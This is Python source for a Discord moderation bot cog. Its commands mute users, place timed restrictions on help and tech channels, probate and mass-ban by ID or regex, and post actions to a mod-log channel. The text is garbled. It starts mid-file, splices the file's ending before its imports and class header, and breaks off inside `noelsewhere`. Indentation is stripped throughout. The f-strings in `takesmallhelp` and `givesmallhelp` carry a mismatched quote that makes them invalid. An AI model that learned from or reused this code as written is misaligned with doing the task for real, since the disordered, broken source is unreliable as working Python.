await ctx.send("💢 I don't have permission to do this.")
await ctx.send(f"{member.mention} can access the help channels again.")
msg = f"⭕️ **Help access restored**: {ctx.author.mention} restored access to help channels to {member.mention} | {self.bot.escape_text(member)}"
await self.bot.channels['mod-logs'].send(msg)
await crud.remove_timed_restriction(member.id, 'timenohelp')
@is_staff("Helper")
@commands.guild_only()
@commands.command(aliases=["timenohelp"])
async def timetakehelp(self, ctx, member: discord.Member, length, *, reason=""):
"""Restricts a user from Assistance Channels for a limited period of time. Staff and Helpers only.\n\nLength format: #d#h#m#s"""
if await check_bot_or_staff(ctx, member, "takehelp"):
return
issuer = ctx.author
if (seconds := utils.parse_time(length)) == -1:
return await ctx.send("💢 I don't understand your time format.")
delta = datetime.timedelta(seconds=seconds)
timestamp = datetime.datetime.now()
unnohelp_time = timestamp + delta
unnohelp_time_string = unnohelp_time.strftime("%Y-%m-%d %H:%M:%S")
await crud.add_timed_restriction(member.id, unnohelp_time, 'timenohelp')
await crud.add_permanent_role(member.id, self.bot.roles['No-Help'].id)
await member.add_roles(self.bot.roles['No-Help'])
msg_user = "You lost access to help channels temporarily!"
if reason != "":
msg_user += " The given reason is: " + reason
msg_user += "\n\nIf you feel this was unjustified, you may appeal in <#270890866820775946>."
msg_user += f"\n\nThis restriction expires {unnohelp_time_string} {time.tzname[0]}."
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} can no longer speak in Assistance Channels.")
signature = utils.command_signature(ctx.command)
msg = f"🚫 **Timed No-Help**: {issuer.mention} restricted {member.mention} for {delta}, until {unnohelp_time_string} | {self.bot.escape_text(member)}"
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command(aliases=["notech", "technt"])
async def taketech(self, ctx, member: Union[discord.Member, discord.User], *, reason=""):
"""Remove access to the tech channel. Staff and Helpers only."""
if await check_bot_or_staff(ctx, member, "taketech"):
return
if not await crud.add_permanent_role(member.id, self.bot.roles['No-Tech'].id):
# Check if the user has a timed restriction.
# If there is one, this will convert it to a permanent one.
# If not, it will display that it was already taken.
if not await crud.get_time_restrictions_by_user_type(member.id, 'timenotech'):
return await ctx.send("This user's tech is already taken!")
else:
await crud.remove_timed_restriction(member.id, 'timenotech')
msg_user = "You lost access to the tech channel!"
if isinstance(member, discord.Member):
await member.add_roles(self.bot.roles['No-Tech'])
if reason != "":
msg_user += " The given reason is: " + reason
msg_user += "\n\nIf you feel this was unjustified, you may appeal in <#270890866820775946>."
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} can no longer access the tech channel.")
msg = f"🚫 **Help access removed**: {ctx.author.mention} removed access to tech channel from {member.mention} | {self.bot.escape_text(member)}"
signature = utils.command_signature(ctx.command)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command(aliases=["yestech"])
async def givetech(self, ctx, member: Union[discord.Member, discord.User]):
"""Restore access to the tech channel. Staff and Helpers only."""
if not await crud.remove_permanent_role(member.id, self.bot.roles["No-Tech"].id):
return await ctx.send("This user is not take-helped!")
if isinstance(member, discord.Member):
try:
await member.remove_roles(self.bot.roles['No-Tech'])
except discord.errors.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
await ctx.send(f"{member.mention} can access the tech channel again.")
msg = f"⭕️ **Help access restored**: {ctx.author.mention} restored access to tech channel to {member.mention} | {self.bot.escape_text(member)}"
await self.bot.channels['mod-logs'].send(msg)
await crud.remove_timed_restriction(member.id, 'timenotech')
@is_staff("Helper")
@commands.guild_only()
@commands.command(aliases=["timenotech"])
async def timetaketech(self, ctx, member: discord.Member, length, *, reason=""):
"""Restricts a user from the tech channel for a limited period of time. Staff and Helpers only.\n\nLength format: #d#h#m#s"""
if await check_bot_or_staff(ctx, member, "taketech"):
return
issuer = ctx.author
if (seconds := utils.parse_time(length)) == -1:
return await ctx.send("💢 I don't understand your time format.")
delta = datetime.timedelta(seconds=seconds)
timestamp = datetime.datetime.now()
unnotech_time = timestamp + delta
unnotech_time_string = unnotech_time.strftime("%Y-%m-%d %H:%M:%S")
await crud.add_timed_restriction(member.id, unnotech_time, 'timenotech')
await crud.add_permanent_role(member.id, self.bot.roles['No-Tech'].id)
await member.add_roles(self.bot.roles['No-Tech'])
msg_user = "You lost access to the tech channel temporarily!"
if reason != "":
msg_user += " The given reason is: " + reason
msg_user += "\n\nIf you feel this was unjustified, you may appeal in <#270890866820775946>."
msg_user += f"\n\nThis restriction expires {unnotech_time_string} {time.tzname[0]}."
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} can no longer speak in the tech channel.")
signature = utils.command_signature(ctx.command)
msg = f"🚫 **Timed No-Tech**: {issuer.mention} restricted {member.mention} for {delta}, until {unnotech_time_string} | {self.bot.escape_text(member)}"
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command(aliases=["mutehelp"])
async def helpmute(self, ctx, member: Union[discord.Member, discord.User], *, reason=""):
"""Remove speak perms to the assistance channels. Staff and Helpers only."""
if await check_bot_or_staff(ctx, member, "helpmute"):
return
if not await crud.add_permanent_role(member.id, self.bot.roles['help-mute'].id):
if not await crud.get_time_restrictions_by_user_type(member.id, 'timehelpmute'):
return await ctx.send("This user is already helpmuted!")
else:
await crud.remove_timed_restriction(member.id, 'timehelpmute')
msg_user = "You muted in the help channels!"
if isinstance(member, discord.Member):
await member.add_roles(self.bot.roles['help-mute'])
if reason != "":
msg_user += " The given reason is: " + reason
msg_user += "\n\nIf you feel this was unjustified, you may appeal in <#270890866820775946>."
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} can no longer speak in the help channels.")
msg = f"🚫 **Help mute**: {ctx.author.mention} removed speak access in help channels from {member.mention} | {self.bot.escape_text(member)}"
signature = utils.command_signature(ctx.command)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command(aliases=["timemutehelp"])
async def timehelpmute(self, ctx, member: discord.Member, length, *, reason=""):
"""Restricts a user from speaking in Assistance Channels for a limited period of time. Staff and Helpers only.\n\nLength format: #d#h#m#s"""
if await check_bot_or_staff(ctx, member, "helpmute"):
return
issuer = ctx.author
if (seconds := utils.parse_time(length)) == -1:
return await ctx.send("💢 I don't understand your time format.")
delta = datetime.timedelta(seconds=seconds)
timestamp = datetime.datetime.now()
unhelpmute_time = timestamp + delta
unhelpmute_time_string = unhelpmute_time.strftime("%Y-%m-%d %H:%M:%S")
await crud.add_timed_restriction(member.id, unhelpmute_time, 'timehelpmute')
await crud.add_permanent_role(member.id, self.bot.roles['help-mute'].id)
await member.add_roles(self.bot.roles['help-mute'])
msg_user = "You lost send access to help channels temporarily!"
if reason != "":
msg_user += " The given reason is: " + reason
msg_user += "\n\nIf you feel this was unjustified, you may appeal in <#270890866820775946>."
msg_user += f"\n\nThis restriction expires {unhelpmute_time_string} {time.tzname[0]}."
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} can no longer speak in the help channels.")
signature = utils.command_signature(ctx.command)
msg = f"🚫 **Timed Help mute**: {issuer.mention} help muted {member.mention} for {delta}, until {unhelpmute_time_string} | {self.bot.escape_text(member)}"
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command()
async def helpunmute(self, ctx, member: Union[discord.Member, discord.User]):
"""Restores speak access to help channels. Helpers+ only."""
if not await crud.remove_permanent_role(member.id, self.bot.roles["help-mute"].id):
return await ctx.send("This user is not help muted!")
if isinstance(member, discord.Member):
try:
await member.remove_roles(self.bot.roles['help-mute'])
except discord.errors.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
await crud.remove_timed_restriction(member.id, 'timehelpmute')
await ctx.send(f"{member.mention} can now speak in the help channels again.")
msg = f"⭕ **Help unmuted**: {ctx.author.mention} help unmuted {member.mention} | {self.bot.escape_text(member)}"
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command()
async def takesmallhelp(self, ctx, members: commands.Greedy[discord.Member]):
"""Remove access to small help channel. Staff and Helpers only."""
if len(members) < 1:
await ctx.send("Mention at least one user")
return
for member in members:
await member.remove_roles(self.bot.roles['Small Help'])
await ctx.send(f"{", ".join([x.mention for x in members])} can no longer access the small help channel.")
msg = f"⭕️ **Small help access revoked**: {ctx.author.mention} revoked access to small help channel from {", ".join([f"{x.mention} | {x}'for x in members])}"
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command()
async def givesmallhelp(self, ctx, members: commands.Greedy[discord.Member]):
"""Provide access to small help channel for 1-on-1 help. Staff and Helpers only."""
if len(members) < 1:
await ctx.send("Mention at least one user")
return
for member in members:
await member.add_roles(self.bot.roles['Small Help'])
await ctx.send(f"{", ".join([x.mention for x in members])} can access the small help channel.")
msg = f"⭕️ **Small help access granted**: {ctx.author.mention} granted access to small help channel to {", ".join([f"{x.mention} | {x}'for x in members])}"
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command()
async def probate(self, ctx, member: Union[discord.Member, discord.User], *, reason=""):
"""Probate a user. Staff and Helpers only."""
if await check_bot_or_staff(ctx, member, "probate"):
return
if not await crud.add_permanent_role(member.id, self.bot.roles['Probation'].id):
return await ctx.send("This user is already probated!")
if isinstance(member, discord.Member):
await member.add_roles(self.bot.roles['Probation'])
msg_user = "You are under probation!"
if reason != "":
msg_user += " The given reason is: " + reason
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} is now in probation.")
msg = f"🚫 **Probated**: {ctx.author.mention} probated {member.mention} | {self.bot.escape_text(member)}"
signature = utils.command_signature(ctx.command)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Helper")
@commands.guild_only()
@commands.command()
async def unprobate(self, ctx, member: Union[discord.Member, discord.User]):
"""Unprobate a user. Staff and Helpers only."""
if not await crud.remove_permanent_role(member.id, self.bot.roles["Probation"].id) and self.bot.roles["Probation"] not in member.roles:
return await ctx.send("This user is not probated!")
if isinstance(member, discord.Member):
await member.remove_roles(self.bot.roles['Probation'])
await ctx.send(f"{member.mention} is out of probation.")
msg = f"⭕️ **Un-probated**: {ctx.author.mention} un-probated {member.mention} | {self.bot.escape_text(member)}"
await self.bot.channels['mod-logs'].send(msg)
@is_staff("Owner")
@commands.guild_only()
@commands.command()
async def updatechannel(self, ctx, name, channel: discord.TextChannel):
"""Changes the id of a channel"""
if name not in self.bot.channels:
await ctx.send("Invalid channel name!")
return
await models.Channel.update.values(id=channel.id).where(models.Channel.name == name).gino.status()
self.bot.channels[name] = channel
await ctx.send(f"Changed {name} channel to {channel.mention} | {channel.id}")
await self.bot.channels['server-logs'].send(f"⚙ **Changed**: {ctx.author.mention} changed {name} channel to {channel.mention} | {channel.id}")
@is_staff("Owner")
@commands.guild_only()
@commands.command()
async def setmodchannel(self, ctx, channel: discord.TextChannel, value: bool):
"""Changes the mod flag of a channel"""
dbchannel = await crud.get_dbchannel(channel.id)
await dbchannel.update(mod_channel=value).apply()
await ctx.send(f"{channel.mention} is {"now" if value else "no longer"} a mod channel.")
@is_staff("OP")
@commands.command()
async def playing(self, ctx, *, gamename):
"""Sets playing message. Staff only."""
await self.bot.change_presence(activity=discord.Game(name=gamename))
@is_staff("OP")
@commands.command()
async def status(self, ctx, status):
"""Sets status. Staff only."""
if status == "online":
await self.bot.change_presence(status=discord.Status.online)
elif status == "offline":
await self.bot.change_presence(status=discord.Status.offline)
elif status == "idle":
await self.bot.change_presence(status=discord.Status.idle)
elif status == "dnd":
await self.bot.change_presence(status=discord.Status.dnd)
elif status == "invisible":
await self.bot.change_presence(status=discord.Status.invisible)
@is_staff("OP")
@commands.command()
async def username(self, ctx, *, username):
"""Sets bot name. Staff only."""
await self.bot.user.edit(username=username)
@is_staff("SuperOP")
@commands.guild_only()
@commands.command()
async def nofilter(self, ctx, channel: discord.TextChannel):
"""Adds nofilter to the channel"""
if await crud.check_nofilter(channel):
return await ctx.send("This channel is already no filtered!")
await crud.add_nofilter(channel)
await self.bot.channels['mod-logs'].send(f"⭕ **No filter**: {ctx.author.mention} added no filter to {channel.mention}")
@is_staff("SuperOP")
@commands.guild_only()
@commands.command()
async def filter(self, ctx, channel: discord.TextChannel):
"""Removes nofilter from the channel"""
if not await crud.check_nofilter(channel):
return await ctx.send("This channel is already filtered!")
await crud.remove_nofilter(channel)
await self.bot.channels['mod-logs'].send(f"🚫 **Filter**: {ctx.author.mention} removed no filter from {channel.mention}")
@is_staff("Helper")
@commands.guild_only()
@commands.command()
async def approve(self, ctx, alias: str, invite: discord.Invite, times: int = 1):
"""Approves a server invite for a number of times. Staff and Helpers only."""
code = invite.code
if await self.bot.invitefilter.fetch_invite_by_alias(alias) or await self.bot.invitefilter.fetch_invite_by_code(code):
return await ctx.send("This code or alias is already in use!")
if times < 1:
return await ctx.send("The invite must be approved for a number of times higher than 0")
await self.bot.invitefilter.add(code=code, alias=alias, uses=times)
await ctx.send(f"Approved an invite to {invite.guild}({code}) for posting {times} times")
await self.bot.channels['mod-logs'].send(f"⭕ **Approved**: {ctx.author.mention} approved server {invite.guild}({code}) to be posted {times} times")
@is_staff("SuperOP")
@commands.command(aliases=['setrole', 'scr'])
async def setchannelrole(self, ctx, channel: discord.TextChannel, role: discord.Role):
"""Sets the default role of a channel."""
dbchannel = await models.Channel.get(channel.id)
if not dbchannel:
dbchannel = await crud.add_dbchannel(channel.id, channel.name)
if not await models.Role.get(role.id):
await crud.add_dbrole(role.id, role.name)
await dbchannel.update(default_role=role.id).apply()
await ctx.send("Parameter updated succesfully")
@is_staff("Helper")
@commands.command(aliases=['ci'])
async def channelinfo(self, ctx, channel: discord.TextChannel = None):
"""Shows database information about a text channel."""
state = {0: "Not locked", 1: "softlocked", 2: "locked", 3: "super locked"}
if not channel:
channel = ctx.channel
dbchannel = await models.Channel.get(channel.id)
if not dbchannel:
return await ctx.send("This channel is not in the database")
role = await crud.get_dbrole(dbchannel.default_role) if dbchannel.default_role else ctx.guild.default_role
embed = discord.Embed(title=dbchannel.name)
embed.add_field(name="ID", value=dbchannel.id, inline=False)
embed.add_field(name="Default Role", value=role.name, inline=False)
embed.add_field(name="Filtered", value=str(not dbchannel.nofilter), inline=False)
embed.add_field(name="Status", value=state[dbchannel.lock_level], inline=False)
await ctx.send(embed=embed)
@is_staff("OP")
@commands.bot_has_permissions(manage_roles=True)
@commands.guild_only()
@commands.command()
async def tempstream(self, ctx, member: discord.Member, length: str = ""):
"""Gives temporary streaming permissions to a member. Lasts 24 hours by default"""
await member.add_roles(self.bot.roles['streamer(temp)'])
timestamp = datetime.datetime.now()
seconds = utils.parse_time(length) if length else 86400
if seconds == -1:
return await ctx.send("💢 I don't understand your time format.")
delta = datetime.timedelta(seconds=seconds)
expiring_time = timestamp + delta
expiring_time_string = expiring_time.strftime("%Y-%m-%d %H:%M:%S")
await crud.add_timed_role(member.id, self.bot.roles['streamer(temp)'].id, expiring_time)
msg_user = f"You have been given streaming permissions until {expiring_time_string}!"
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} has been given streaming permissions until {expiring_time_string}.")
await self.bot.channels['mod-logs'].send(f"⭕ **Permission Granted**: {ctx.author.mention} granted streaming permissions to {member.mention} until {expiring_time_string}")
@is_staff("OP")
@commands.bot_has_permissions(manage_roles=True)
@commands.guild_only()
@commands.command()
async def notempstream(self, ctx, member: discord.Member):
"""Revokes temporary streaming permissions from a member."""
await member.remove_roles(self.bot.roles['streamer(temp)'])
await crud.remove_timed_role(member.id, self.bot.roles['streamer(temp)'].id)
msg_user = "Your temporary streaming permissions have been revoked!"
await utils.send_dm_message(member, msg_user, ctx)
await self.bot.channels['mod-logs'].send(f"⭕ **Permission Revoked**: {ctx.author.mention} revoked {member.mention} streaming permissions.")
def setup(bot):
bot.add_cog(Mod(bot))
| import datetime
import discord
import re
import time
from discord.ext import commands
from subprocess import call
from typing import Union
from utils import utils, crud, models
from utils.checks import is_staff, check_staff_id, check_bot_or_staff
class Mod(commands.Cog):
"""
Staff commands.
"""
def __init__(self, bot):
self.bot = bot
@is_staff("Owner")
@commands.command()
async def quit(self, ctx):
"""Stops the bot."""
await ctx.send("👋 Bye bye!")
await self.bot.close()
@is_staff("SuperOP")
@commands.command()
async def pull(self, ctx):
"""Pull new changes from GitHub and restart."""
if self.bot.IS_DOCKER:
await ctx.send("Pull isn't used when running from a Docker container!")
return
else:
await ctx.send("Pulling changes...")
call(['git', 'pull'])
await ctx.send("👋 Restarting bot!")
await self.bot.close()
@is_staff("Helper")
@commands.guild_only()
@commands.command(aliases=['ui'])
async def userinfo(self, ctx, u: Union[discord.Member, discord.User]):
"""Shows information from a user. Staff and Helpers only."""
basemsg = f"name = {u.name}\nid = {u.id}\ndiscriminator = {u.discriminator}\navatar = {u.avatar}\nbot = {u.bot}\navatar_url = {u.avatar_url_as(static_format='png')}\ndefault_avatar= {u.default_avatar}\ndefault_avatar_url = <{u.default_avatar_url}>\ncreated_at = {u.created_at}\n"
if isinstance(u, discord.Member):
role = u.top_role.name
await ctx.send(f"{basemsg}display_name = {u.display_name}\njoined_at = {u.joined_at}\nstatus ={u.status}\nactivity = {u.activity.name if u.activity else None}\ncolour = {u.colour}\ntop_role = {role}\n")
else:
try:
ban = await ctx.guild.fetch_ban(u)
except discord.NotFound: # NotFound is raised if the user isn't banned
ban = None
await ctx.send(f"{basemsg}{f'**Banned**, reason: {ban.reason}' if ban is not None else ''}\n")
@commands.guild_only()
@commands.command(aliases=['ui2'])
async def userinfo2(self, ctx, user: Union[discord.Member, discord.User] = None):
"""Shows information from a user. Staff and Helpers only."""
if user is None:
user = ctx.author
if (not await check_staff_id('Helper', ctx.author.id)) and (ctx.author != user or ctx.channel != self.bot.channels['bot-cmds']):
await ctx.message.delete()
return await ctx.send(f"{ctx.author.mention} This command can only be used in {self.bot.channels['bot-cmds'].mention} and only on yourself.", delete_after=10)
embed = discord.Embed(color=utils.gen_color(user.id))
embed.description = (
f"**User:** {user.mention}\n"
f"**User's ID:** {user.id}\n"
f"**Created on:** {user.created_at}\n"
f"**Default Profile Picture:** {user.default_avatar}\n"
)
if isinstance(user, discord.Member):
member_type = "member"
embed.description += (
f"**Join date:** {user.joined_at}\n"
f"**Current Status:** {user.status}\n"
f"**User Activity:** {user.activity}\n"
f"**Current Display Name:** {user.display_name}\n"
f"**Nitro Boost Info:** {user.premium_since}\n"
f"**Current Top Role:** {user.top_role}\n"
f"**Color:** {user.color}\n"
)
else:
member_type = "user"
try:
ban = await ctx.guild.fetch_ban(user)
embed.description += f"\n**Banned**, reason: {ban.reason}"
except discord.NotFound:
pass
member_type = member_type if not user.bot else "bot"
embed.title = f"**Userinfo for {member_type} {user}**"
embed.set_thumbnail(url=str(user.avatar_url_as(static_format='png')))
await ctx.send(embed=embed)
@is_staff("HalfOP")
@commands.guild_only()
@commands.command()
async def matchuser(self, ctx, *, rgx: str):
"""Match users by regex."""
author = ctx.author
msg = "```\nmembers:\n"
for m in self.bot.guild.members:
if bool(re.search(rgx, m.name, re.IGNORECASE)):
msg += f"{m.id} - {m}\n"
msg += "```"
if len(msg) > 4000:
for page in utils.paginate_message(msg).pages:
await author.send(page)
else:
await author.send(msg)
@is_staff("Owner")
@commands.guild_only()
@commands.command(aliases=['gigayeet'])
async def multiban(self, ctx, users: commands.Greedy[int]):
"""Multi-ban users."""
author = ctx.author
msg = "```\nfailed:\n"
for m in users:
try:
await self.bot.guild.ban(discord.Object(id=m))
except (discord.errors.NotFound, discord.errors.Forbidden) as e:
msg += f"{m}:\n {e.text}\n"
pass
msg += "```"
await utils.send_dm_message(author, msg)
@is_staff("Owner")
@commands.guild_only()
@commands.bot_has_permissions(ban_members=True)
@commands.command(aliases=['gigayeetre'])
async def multibanre(self, ctx, *, rgx: str):
"""Multi-ban users by regex."""
author = ctx.author
msg = "```\nbanned:\n"
toban = [] # because "dictionary changed size during iteration"
for m in self.bot.guild.members:
if bool(re.search(rgx, m.name, re.IGNORECASE)):
msg += f"{m.id} - {m}\n"
toban.append(m)
for m in toban:
try:
await m.ban()
except discord.errors.NotFound:
pass
msg += "```"
await utils.send_dm_message(author, msg)
@is_staff("Helper")
@commands.bot_has_permissions(manage_channels=True)
@commands.guild_only()
@commands.command()
async def slowmode(self, ctx, time, channel: discord.TextChannel = None):
"""Apply a given slowmode time to a channel.
The time format is identical to that used for timed kicks/bans/takehelps.
It is not possible to set a slowmode longer than 6 hours.
Helpers in assistance channels and Staff only."""
if not channel:
channel = ctx.channel
if channel not in self.bot.assistance_channels and not await check_staff_id("OP", ctx.author.id):
return await ctx.send("You cannot use this command outside of assistance channels.")
if (seconds := utils.parse_time(time)) == -1:
return await ctx.send("💢 I don't understand your time format.")
if seconds > 21600:
return await ctx.send("💢 You can't slowmode a channel for longer than 6 hours!")
try:
await channel.edit(slowmode_delay=seconds)
await ctx.send(f"Slowmode delay for {channel.mention} is now {time} ({seconds}).")
except discord.errors.Forbidden:
return await ctx.send("💢 I don't have permission to do this.")
msg = f"🕙 **Slowmode**: {ctx.author.mention} set a slowmode delay of {time} ({seconds}) in {channel.mention}"
await self.bot.channels["mod-logs"].send(msg)
@is_staff("Helper")
@commands.has_permissions(manage_messages=True)
@commands.guild_only()
@commands.command(aliases=["clear"])
async def purge(self, ctx, limit: int):
"""Clears a given number of messages. Helpers in assistance channels and Staff only."""
deleted = await ctx.channel.purge(limit=limit + 1, check=lambda message: not message.pinned)
msg = f"🗑 **Cleared**: {ctx.author.mention} cleared {len(deleted)} messages in {ctx.channel.mention}"
await self.bot.channels['mod-logs'].send(msg)
@is_staff("HalfOP")
@commands.guild_only()
@commands.command()
async def metamute(self, ctx, member: discord.Member, *, reason=""):
"""Mutes a user so they can't speak in meta. Staff only."""
if not await crud.add_permanent_role(member.id, self.bot.roles['meta-mute'].id):
await ctx.send("User is already meta muted!")
return
await member.add_roles(self.bot.roles['meta-mute'])
msg_user = "You were meta muted!"
if reason != "":
msg_user += " The given reason is: " + reason
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} can no longer speak in meta.")
msg = f"🔇 **Meta muted**: {ctx.author.mention} meta muted {member.mention} | {self.bot.escape_text(member)}"
signature = utils.command_signature(ctx.command)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("HalfOP")
@commands.guild_only()
@commands.bot_has_permissions(manage_roles=True)
@commands.command()
async def metaunmute(self, ctx, member: discord.Member):
"""Unmutes a user so they can speak in meta. Staff only."""
try:
if not await crud.remove_permanent_role(member.id, self.bot.roles["meta-mute"].id) and self.bot.roles['meta-mute'] not in member.roles:
return await ctx.send("This user is not meta muted!")
await member.remove_roles(self.bot.roles['meta-mute'])
await ctx.send(f"{member.mention} can now speak in meta again.")
msg = f"🔈 **Meta unmuted**: {ctx.author.mention} meta unmuted {member.mention} | {self.bot.escape_text(member)}"
await self.bot.channels['mod-logs'].send(msg)
except discord.errors.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
@is_staff("HalfOP")
@commands.guild_only()
@commands.bot_has_permissions(manage_roles=True)
@commands.command()
async def mute(self, ctx, member: discord.Member, *, reason=""):
"""Mutes a user so they can't speak. Staff only."""
if await check_bot_or_staff(ctx, member, "mute"):
return
if not await crud.add_permanent_role(member.id, self.bot.roles['Muted'].id):
# Check if the user has a timed restriction.
# If there is one, this will convert it to a permanent one.
# If not, it will display that it was already taken.
if not await crud.get_time_restrictions_by_user_type(member.id, 'timemute'):
return await ctx.send("User is already muted!")
else:
await crud.remove_timed_restriction(member.id, 'timemute')
await member.add_roles(self.bot.roles['Muted'])
await member.remove_roles(self.bot.roles['#elsewhere'], self.bot.roles['#art-discussion'])
msg_user = "You were muted!"
if reason != "":
msg_user += " The given reason is: " + reason
await utils.send_dm_message(member, msg_user, ctx)
await ctx.send(f"{member.mention} can no longer speak.")
msg = f"🔇 **Muted**: {ctx.author.mention} muted {member.mention} | {self.bot.escape_text(member)}"
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
signature = utils.command_signature(ctx.command)
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
# change to permanent mute
@is_staff("HalfOP")
@commands.bot_has_permissions(manage_roles=True)
@commands.guild_only()
@commands.command()
async def timemute(self, ctx, member: discord.Member, length, *, reason=""):
"""Mutes a user for a limited period of time so they can't speak. Staff only.\n\nLength format: #d#h#m#s"""
if await check_bot_or_staff(ctx, member, "mute"):
return
await member.add_roles(self.bot.roles['Muted'])
await member.remove_roles(self.bot.roles['#elsewhere'], self.bot.roles['#art-discussion'])
issuer = ctx.author
if (seconds := utils.parse_time(length)) == -1:
return await ctx.send("💢 I don't understand your time format.")
timestamp = datetime.datetime.now()
delta = datetime.timedelta(seconds=seconds)
unmute_time = timestamp + delta
unmute_time_string = unmute_time.strftime("%Y-%m-%d %H:%M:%S")
old_timestamp = await crud.add_timed_restriction(member.id, unmute_time, 'timemute')
await crud.add_permanent_role(member.id, self.bot.roles['Muted'].id)
msg_user = "You were muted!"
if reason != "":
msg_user += " The given reason is: " + reason
msg_user += f"\n\nThis mute expires {unmute_time_string} {time.tzname[0]}."
await utils.send_dm_message(member, msg_user, ctx)
signature = utils.command_signature(ctx.command)
if not old_timestamp:
await ctx.send(f"{member.mention} can no longer speak.")
msg = f"🔇 **Timed mute**: {issuer.mention} muted {member.mention}| {self.bot.escape_text(member)} for {delta}, until {unmute_time_string} "
else:
await ctx.send(f"{member.mention} mute was updated.")
msg = f"🔇 **Timed mute**: {issuer.mention} updated {member.mention}| {self.bot.escape_text(member)} time mute from {old_timestamp} until {unmute_time_string}"
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("HalfOP")
@commands.guild_only()
@commands.command()
async def unmute(self, ctx, member: discord.Member):
"""Unmutes a user so they can speak. Staff only."""
try:
if not await crud.remove_permanent_role(member.id, self.bot.roles["Muted"].id):
return await ctx.send("This user is not muted")
await member.remove_roles(self.bot.roles['Muted'])
await ctx.send(f"{member.mention} can now speak again.")
msg = f"🔈 **Unmuted**: {ctx.author.mention} unmuted {member.mention} | {self.bot.escape_text(member)}"
await self.bot.channels['mod-logs'].send(msg)
await crud.remove_timed_restriction(member.id, 'timemute')
except discord.errors.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
@is_staff("HalfOP")
@commands.command()
async def art(self, ctx, member: discord.Member):
"""Restore art-discussion access for a user. Staff only."""
if not await crud.remove_permanent_role(member.id, self.bot.roles['No-art'].id):
return await ctx.send("This user is not restricted from art channels.")
try:
await member.remove_roles(self.bot.roles['No-art'])
except discord.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
await ctx.send(f"{member.mention} can access art-discussion again.")
msg = f"⭕️ **Restored art**: {ctx.message.author.mention} restored art access to {member.mention} | {self.bot.escape_text(member)}"
await self.bot.channels['mod-logs'].send(msg)
@is_staff("HalfOP")
@commands.command()
async def noart(self, ctx, member: discord.Member, *, reason=""):
"""Removes art-discussion access from a user. Staff only."""
if not await crud.add_permanent_role(member.id, self.bot.roles['No-art'].id):
return await ctx.send("This user is already restricted from art channels.")
try:
await member.add_roles(self.bot.roles['No-art'])
except discord.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
await ctx.send(f"{member.mention} can no longer access art-discussion.")
msg = f"🚫 **Removed art**: {ctx.message.author.mention} removed art access from {member.mention} | {self.bot.escape_text(member)}"
signature = utils.command_signature(ctx.command)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
else:
msg += f"\nPlease add an explanation below. In the future, it is recommended to use `{signature}` as the reason is automatically sent to the user."
await self.bot.channels['mod-logs'].send(msg)
@is_staff("HalfOP")
@commands.guild_only()
@commands.command()
async def elsewhere(self, ctx, member: discord.Member):
"""Restore elsewhere access for a user. Staff only."""
try:
if not await crud.remove_permanent_role(member.id, self.bot.roles["No-elsewhere"].id):
return await ctx.send("This user is not restricted from elsewhere!")
await member.remove_roles(self.bot.roles['No-elsewhere'])
await ctx.send(f"{member.mention} can access elsewhere again.")
msg = f"⭕️ **Restored elsewhere**: {ctx.author.mention} restored elsewhere access to {member.mention} | {self.bot.escape_text(member)}"
await self.bot.channels['mod-logs'].send(msg)
except discord.errors.Forbidden:
await ctx.send("💢 I don't have permission to do this.")
@is_staff("HalfOP")
@commands.guild_only()
@commands.command()
async def noelsewhere(self, ctx, member: discord.Member, *, reason=""):
